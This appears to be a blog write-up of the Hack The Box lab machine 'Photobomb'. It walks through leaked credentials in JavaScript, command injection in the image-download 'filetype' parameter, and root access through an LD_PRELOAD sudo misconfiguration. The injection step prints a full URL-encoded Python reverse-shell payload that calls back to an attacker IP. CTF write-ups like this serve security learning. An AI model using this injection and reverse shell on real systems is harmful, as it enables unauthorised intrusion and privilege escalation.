emacab98

Photobomb - HTB - Key Points

October 14, 2022423 words

Target's IP: 10.10.11.182

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Trying to connect to the web server reveals an important information:
Unknown host: photobomb.htb
Connecting to the web server returns 401 - Unauthorized to all requests, but from the developer tools we see that the page includes a Javascript file that contains sensitive information:
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/.*;?\sisPhotoBombTechSupport\s=\s[;]+(.)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}

We can use the credentials to authenticate to the web server, and also use them with tools like gobuster to perform directory busting and trying to find hidden content.

Nothing turns up, and the only page available allows us to download images from the server. Intercepting the request, we can see it is a POST with three parameters, so let's try to inject each one of them
The second one, filetype, is subject to command injection, so we can exploit it to launch a reverse shell (this is a classic python reverse shell, just url encoded as it needs to be submitted to the server):

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AFINET,socket.SOCKSTREAM);s.connect((%22<IP ADDRESS>%22,9988));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/sh%22)'&dimensions=3000x2000
This way we get a shell on the box as user wizard.
During a basic enumeration phase, we see wizard can run sudo and maintain their environment variables. Also, the binary that wizard can run with sudo privileges makes a call to the find binary without using its full path, so we can follow this guide to exploit it, although do not use -shared but generate a full binary called find.
wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    envreset, mailbadpass,
    securepath=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$ sudo LDPRELOAD=/home/wizard/find /opt/cleanup.sh 
root@photobomb:/home/wizard# cat user.txt 
85...49
root@photobomb:/home/wizard# cat /root/root.txt 
88...34

Box done, merry hacking ;)


React to this post
👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

You'll only receive email when they publish something new.

More from emacab98
All posts